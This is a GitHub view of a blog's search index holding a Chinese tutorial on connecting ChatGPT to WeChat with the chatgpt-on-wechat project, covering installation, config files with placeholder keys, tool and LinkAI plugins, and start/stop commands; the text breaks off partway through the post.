-
Notifications
You must be signed in to change notification settings - Fork 0
/
search.xml
1753 lines (838 loc) · 664 KB
/
search.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>ChatGPT 接入微信实践</title>
<link href="/2023/11/05/wechatGPT/"/>
<url>/2023/11/05/wechatGPT/</url>
<content type="html"><![CDATA[<h1 id="ChatGPT-接入微信实践"><a href="#ChatGPT-接入微信实践" class="headerlink" title="ChatGPT 接入微信实践"></a>ChatGPT 接入微信实践</h1><h2 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h2><p>参考:<a href="https://github.com/zhayujie/chatgpt-on-wechat">https://github.com/zhayujie/chatgpt-on-wechat</a></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/zhayujie/chatgpt-on-wechat</span><br><span class="line">cd chatgpt-on-wechat/</span><br><span class="line"></span><br><span class="line">pip3 install -r requirements.txt</span><br><span class="line">pip3 install -r requirements-optional.txt</span><br></pre></td></tr></table></figure><p>修改配置文件:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cp config-template.json config.json</span><br><span class="line">vim config.json</span><br></pre></td></tr></table></figure><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"open_ai_api_key"</span><span class="punctuation">:</span> <span class="string">"sk-"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"model"</span><span class="punctuation">:</span> <span class="string">"gpt-3.5-turbo"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"channel_type"</span><span class="punctuation">:</span> <span class="string">"wx"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"open_ai_api_base"</span><span class="punctuation">:</span> <span class="string">"https://api.aiproxy.io/v1"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"proxy"</span><span class="punctuation">:</span> <span class="string">""</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"hot_reload"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"single_chat_prefix"</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line"> <span class="string">"bot"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="string">"@bot"</span></span><br><span class="line"> <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"single_chat_reply_prefix"</span><span class="punctuation">:</span> <span class="string">"[bot] "</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"group_chat_prefix"</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line"> <span class="string">"@bot"</span></span><br><span class="line"> <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"group_name_white_list"</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="string">"ALL_GROUP"</span><span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"group_chat_in_one_session"</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line"> <span class="string">"ChatGPT测试群"</span></span><br><span class="line"> <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"image_create_prefix"</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line"> <span class="string">"画"</span></span><br><span class="line"> <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"speech_recognition"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"group_speech_recognition"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"voice_reply_voice"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"conversation_max_tokens"</span><span class="punctuation">:</span> <span class="number">1000</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"expires_in_seconds"</span><span class="punctuation">:</span> <span class="number">3600</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"character_desc"</span><span class="punctuation">:</span> <span class="string">"你是ChatGPT, 一个由OpenAI训练的大型语言模型, 你旨在回答并解决人们的任何问题,并且可以使用多种语言与人交流。"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"temperature"</span><span class="punctuation">:</span> <span class="number">0.7</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"top_p"</span><span class="punctuation">:</span> <span class="number">1</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"subscribe_msg"</span><span class="punctuation">:</span> <span class="string">"感谢您的关注!\n这里是ChatGPT,可以自由对话。\n支持语音对话。\n支持图片输入。\n支持图片输出,画字开头的消息将按要求创作图片。\n支持tool、角色扮演和文字冒险等丰富的插件。\n输入{trigger_prefix}#help 查看详细指令。"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"use_linkai"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"linkai_api_base"</span><span class="punctuation">:</span> <span class="string">"https://api.link-ai.tech"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"linkai_api_key"</span><span class="punctuation">:</span> <span class="string">"Link_"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"linkai_app_code"</span><span class="punctuation">:</span> <span class="string">""</span></span><br><span class="line"><span class="punctuation">}</span></span><br></pre></td></tr></table></figure><h2 id="API获取"><a href="#API获取" class="headerlink" title="API获取"></a>API获取</h2><p>项目默认使用OpenAI接口,需前往 <a href="https://beta.openai.com/signup">OpenAI注册页面</a> 创建账号,创建完账号则前往 <a href="https://beta.openai.com/account/api-keys">API管理页面</a> 创建一个 API Key 并保存下来,后面需要在项目中配置这个key。接口需要海外网络访问及绑定信用卡支付。</p><p>或者使用第三方API。</p><p>比如:<a href="https://aiproxy.io/%E3%80%82%EF%BC%88%E6%B6%88%E8%B4%B9%E5%BE%88%E5%A4%9A%EF%BC%89">https://aiproxy.io/。(消费很多)</a></p><p>或者:<a href="https://chat.link-ai.tech/">https://chat.link-ai.tech</a> (推荐,便宜)</p><p>注意,配置第三方linkai_api之后,无需再配置open_ai_api_key.</p><p>配置文件如下:</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"model"</span><span class="punctuation">:</span> <span class="string">"gpt-3.5-turbo"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"channel_type"</span><span class="punctuation">:</span> <span class="string">"wx"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"proxy"</span><span class="punctuation">:</span> <span class="string">""</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"hot_reload"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"single_chat_prefix"</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line"> <span class="string">"bot"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="string">"@bot"</span></span><br><span class="line"> <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"single_chat_reply_prefix"</span><span class="punctuation">:</span> <span class="string">"[bot] "</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"group_chat_prefix"</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line"> <span class="string">"@bot"</span></span><br><span class="line"> <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"group_name_white_list"</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="string">"ALL_GROUP"</span><span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"group_chat_in_one_session"</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line"> <span class="string">"ChatGPT测试群"</span></span><br><span class="line"> <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"image_create_prefix"</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line"> <span class="string">"画"</span></span><br><span class="line"> <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"speech_recognition"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"group_speech_recognition"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"voice_reply_voice"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"conversation_max_tokens"</span><span class="punctuation">:</span> <span class="number">1000</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"expires_in_seconds"</span><span class="punctuation">:</span> <span class="number">3600</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"character_desc"</span><span class="punctuation">:</span> <span class="string">"你是ChatGPT, 一个由OpenAI训练的大型语言模型, 你旨在回答并解决人们的任何问题,并且可以使用多种语言与人交流。"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"temperature"</span><span class="punctuation">:</span> <span class="number">0.7</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"top_p"</span><span class="punctuation">:</span> <span class="number">1</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"subscribe_msg"</span><span class="punctuation">:</span> <span class="string">"感谢您的关注!\n这里是ChatGPT,可以自由对话。\n支持语音对话。\n支持图片输入。\n支持图片输出,画字开头的消息将按要求创作图片。\n支持tool、角色扮演和文字冒险等丰富的插件。\n输入{trigger_prefix}#help 查看详细指令。"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"use_linkai"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"linkai_api_base"</span><span class="punctuation">:</span> <span class="string">"https://api.link-ai.tech"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"linkai_api_key"</span><span class="punctuation">:</span> <span class="string">"Link_"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"linkai_app_code"</span><span class="punctuation">:</span> <span class="string">""</span></span><br><span class="line"><span class="punctuation">}</span></span><br></pre></td></tr></table></figure><h2 id="常用命令"><a href="#常用命令" class="headerlink" title="常用命令"></a>常用命令</h2><h3 id="启动程序"><a href="#启动程序" class="headerlink" title="启动程序"></a>启动程序</h3><p>直接启动:<code>python3 app.py</code></p><p>后台运行:<code>nohup python3 app.py & tail -f nohup.out</code></p><p>日志输出到<code>nohup.out</code></p><h3 id="关闭进程"><a href="#关闭进程" class="headerlink" title="关闭进程"></a>关闭进程</h3><p>搜索进程并kill</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ps -ef | grep app.py | grep -v grepkill -9 加进程号</span><br></pre></td></tr></table></figure><h2 id="tool插件"><a href="#tool插件" class="headerlink" title="tool插件"></a>tool插件</h2><h3 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h3><p><a href="https://github.com/goldfishh/chatgpt-on-wechat/blob/master/plugins/tool/README.md">https://github.com/goldfishh/chatgpt-on-wechat/blob/master/plugins/tool/README.md</a></p><p><strong>Tool工具:</strong> 与操作系统和互联网交互,支持最新信息搜索、数学计算、天气和资讯查询、网页总结,基于 <a href="https://github.com/goldfishh/chatgpt-tool-hub">chatgpt-tool-hub</a> 实现</p><p>相关API申请方法如下:</p><p><a href="https://github.com/goldfishh/chatgpt-tool-hub/blob/master/docs/apply_optional_tool.md">https://github.com/goldfishh/chatgpt-tool-hub/blob/master/docs/apply_optional_tool.md</a></p><h3 id="配置tool插件"><a href="#配置tool插件" class="headerlink" title="配置tool插件"></a>配置tool插件</h3><p>进入目录配置:plugins/tool</p><p>cp config.json.template config.json</p><p>配置需要开启的插件,有些需要API</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"> <span class="number">1</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="number">2</span> <span class="attr">"tools"</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line"> <span class="number">3</span> <span class="string">"news"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="number">4</span> <span class="string">"morning-news"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="number">5</span> <span class="string">"wikipedia"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="number">6</span> <span class="string">"python"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="number">7</span> <span class="string">"url-get"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="number">8</span> <span class="string">"terminal"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="number">9</span> <span class="string">"bing-search"</span><span class="punctuation">,</span></span><br><span class="line"><span class="number">10</span> <span class="string">"meteo-weather"</span><span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"><span class="number">11</span> <span class="attr">"kwargs"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"><span class="number">12</span> <span class="attr">"llm_api_key"</span><span class="punctuation">:</span> <span class="string">""</span><span class="punctuation">,</span></span><br><span class="line"><span class="number">13</span> <span class="attr">"proxy"</span><span class="punctuation">:</span> <span class="string">""</span><span class="punctuation">,</span></span><br><span class="line"><span class="number">14</span> <span class="attr">"debug"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"><span class="number">15</span> <span class="attr">"top_k_results"</span><span class="punctuation">:</span> <span class="number">2</span><span class="punctuation">,</span></span><br><span class="line"><span class="number">16</span> <span class="attr">"no_default"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"><span class="number">17</span> <span class="attr">"model_name"</span><span class="punctuation">:</span> <span class="string">"gpt-3.5-turbo"</span><span class="punctuation">,</span></span><br><span class="line"><span class="number">18</span> <span class="attr">"news_api_key"</span><span class="punctuation">:</span> <span class="string">""</span><span class="punctuation">,</span></span><br><span class="line"><span class="number">19</span> <span class="attr">"bing_subscription_key"</span><span class="punctuation">:</span> <span class="string">""</span><span class="punctuation">,</span></span><br><span class="line"><span class="number">20</span> <span class="attr">"morning_news_api_key"</span><span class="punctuation">:</span> <span class="string">""</span></span><br><span class="line"><span class="number">21</span> <span class="punctuation">}</span></span><br><span class="line"><span class="number">22</span> <span class="punctuation">}</span></span><br></pre></td></tr></table></figure><h3 id="使用tool插件"><a href="#使用tool插件" class="headerlink" title="使用tool插件"></a>使用tool插件</h3><p>#help tool: 查看tool帮助信息,可查看已加载工具列表<br>$tool 命令: 根据给出的{命令}使用一些可用工具尽力为你得到结果。<br>$tool reset: 重置工具。 </p><h3 id="插件未启用bug"><a href="#插件未启用bug" class="headerlink" title="插件未启用bug"></a>插件未启用bug</h3><p>使用一段时间后,提供插件未启用,排查发现是配置文件自动改为了false.</p><p>重新修改为true即可。</p><p>chatgpt-on-wechat/plugins/plugins.json</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">19 "tool": {</span><br><span class="line">20 "enabled": true,</span><br><span class="line">21 "priority": 0</span><br><span class="line">22 },</span><br></pre></td></tr></table></figure><h2 id="知识库平台配置"><a href="#知识库平台配置" class="headerlink" title="知识库平台配置"></a>知识库平台配置</h2><h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h3><p><a href="https://github.com/zhayujie/chatgpt-on-wechat/tree/master/plugins/linkai">https://github.com/zhayujie/chatgpt-on-wechat/tree/master/plugins/linkai</a></p><p><a href="https://link-ai.tech/platform/link-app/wechat">https://link-ai.tech/platform/link-app/wechat</a></p><h3 id="获取API"><a href="#获取API" class="headerlink" title="获取API"></a>获取API</h3><p>进入控制台:</p><p><a href="https://chat.link-ai.tech/console/factory">https://chat.link-ai.tech/console/factory</a></p><p>新用户有免费的600积分。</p><p>我充值了1w积分,生成一张图片需要150积分。</p><h3 id="配置插件"><a href="#配置插件" class="headerlink" title="配置插件"></a>配置插件</h3><p>将 <code>plugins/linkai</code> 目录下的 <code>config.json.template</code> 配置模板复制为最终生效的 <code>config.json</code>。</p><p>配置项中 <code>group_app_map</code> 部分是用于映射群聊与LinkAI平台上的应用, <code>midjourney</code> 部分是 mj 画图的配置,<code>summary</code> 部分是文档总结及对话功能的配置。三部分的配置相互独立,可按需开启。</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"group_app_map"</span><span class="punctuation">:</span> <span class="punctuation">{</span> # 群聊 和 应用编码 的映射关系</span><br><span class="line"> <span class="attr">"测试群名称1"</span><span class="punctuation">:</span> <span class="string">"default"</span><span class="punctuation">,</span> # 表示在名称为 <span class="string">"测试群名称1"</span> 的群聊中将使用app_code 为 default 的应用</span><br><span class="line"> <span class="attr">"测试群名称2"</span><span class="punctuation">:</span> <span class="string">"Kv2fXJcH"</span></span><br><span class="line"> <span class="punctuation">}</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"midjourney"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"enabled"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span> # midjourney 绘画开关</span><br><span class="line"> <span class="attr">"auto_translate"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span> # 是否自动将提示词翻译为英文</span><br><span class="line"> <span class="attr">"img_proxy"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span> # 是否对生成的图片使用代理,如果你是国外服务器,将这一项设置为<span class="literal"><span class="keyword">false</span></span>会获得更快的生成速度</span><br><span class="line"> <span class="attr">"max_tasks"</span><span class="punctuation">:</span> <span class="number">3</span><span class="punctuation">,</span> # 支持同时提交的总任务个数</span><br><span class="line"> <span class="attr">"max_tasks_per_user"</span><span class="punctuation">:</span> <span class="number">1</span><span class="punctuation">,</span> # 支持单个用户同时提交的任务个数</span><br><span class="line"> <span class="attr">"use_image_create_prefix"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span> # 是否使用全局的绘画触发词,如果开启将同时支持由`config.json`中的 image_create_prefix 配置触发</span><br><span class="line"> <span class="punctuation">}</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"summary"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"enabled"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span> # 文档总结和对话功能开关</span><br><span class="line"> <span class="attr">"group_enabled"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span> # 是否支持群聊开启</span><br><span class="line"> <span class="attr">"max_file_size"</span><span class="punctuation">:</span> <span class="number">5000</span> # 文件的大小限制,单位KB,默认为<span class="number">5</span>M,超过该大小直接忽略</span><br><span class="line"> <span class="punctuation">}</span></span><br><span class="line"><span class="punctuation">}</span></span><br></pre></td></tr></table></figure><h3 id="主配置文件"><a href="#主配置文件" class="headerlink" title="主配置文件"></a>主配置文件</h3><p>添加下面几行。</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">"use_linkai"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">"linkai_api_key"</span><span class="punctuation">:</span> <span class="string">""</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">"linkai_app_code"</span><span class="punctuation">:</span> <span class="string">""</span><span class="punctuation">,</span> #选填</span><br><span class="line"><span class="attr">"linkai_api_base"</span><span class="punctuation">:</span> <span class="string">"https://api.link-ai.chat"</span><span class="punctuation">,</span> # linkAI服务地址,若国内无法访问或延迟较高可改为 https<span class="punctuation">:</span><span class="comment">//api.link-ai.tech</span></span><br></pre></td></tr></table></figure><p>刚开始没有写linkai_api_base,会报错。加入这个参数之后可以正常使用。</p><h3 id="Midjourney绘图功能"><a href="#Midjourney绘图功能" class="headerlink" title="Midjourney绘图功能"></a>Midjourney绘图功能</h3><p>开启之后,艾特机器人,并输入提示词”画”,就会根据要求输出图片。</p><h3 id="文档总结功能"><a href="#文档总结功能" class="headerlink" title="文档总结功能"></a>文档总结功能</h3><p>该功能依赖 LinkAI的知识库及对话功能,需要在项目根目录的config.json中设置 <code>linkai_api_key</code>, 同时根据上述插件配置说明,在插件config.json添加 <code>summary</code> 部分的配置,设置 <code>enabled</code> 为 true。</p><p>如果不想创建 <code>plugins/linkai/config.json</code> 配置,可以直接通过 <code>$linkai sum open</code> 指令开启该功能。</p><p>功能开启后,向机器人发送 <strong>文件</strong> 或 <strong>分享链接卡片</strong> 即可生成摘要,进一步可以与文件或链接的内容进行多轮对话。</p><ol><li>文件目前 支持 <code>txt</code>, <code>docx</code>, <code>pdf</code>, <code>md</code>, <code>csv</code>格式,文件大小由 <code>max_file_size</code> 限制,最大不超过15M,文件字数最多可支持百万字的文件。但不建议上传字数过多的文件,一是token消耗过大,二是摘要很难覆盖到全部内容,只能通过多轮对话来了解细节。</li><li>分享链接 目前仅支持 公众号文章,后续会支持更多文章类型及视频链接等</li><li>总结及对话的 费用与 LinkAI 3.5-4K 模型的计费方式相同,按文档内容的tokens进行计算</li></ol><h2 id="语音功能"><a href="#语音功能" class="headerlink" title="语音功能"></a>语音功能</h2><p>暂时报错,未解决。</p><p>提示缺少ffmpeg ,安装后发现后台运行会报错,且未解决问题。</p><p>于是直接关闭语音识别和回复语音的功能。</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">23</span> <span class="attr">"speech_recognition"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"><span class="number">24</span> <span class="attr">"group_speech_recognition"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"><span class="number">25</span> <span class="attr">"voice_reply_voice"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br></pre></td></tr></table></figure><h2 id="效果演示"><a href="#效果演示" class="headerlink" title="效果演示"></a>效果演示</h2><h3 id="工具列表"><a href="#工具列表" class="headerlink" title="工具列表"></a>工具列表</h3><p><img src="/2023/11/05/wechatGPT/tools.jpg" alt="tools"></p><h3 id="今日新闻"><a href="#今日新闻" class="headerlink" title="今日新闻"></a>今日新闻</h3><p><img src="/2023/11/05/wechatGPT/news.jpg" alt="news"></p><h3 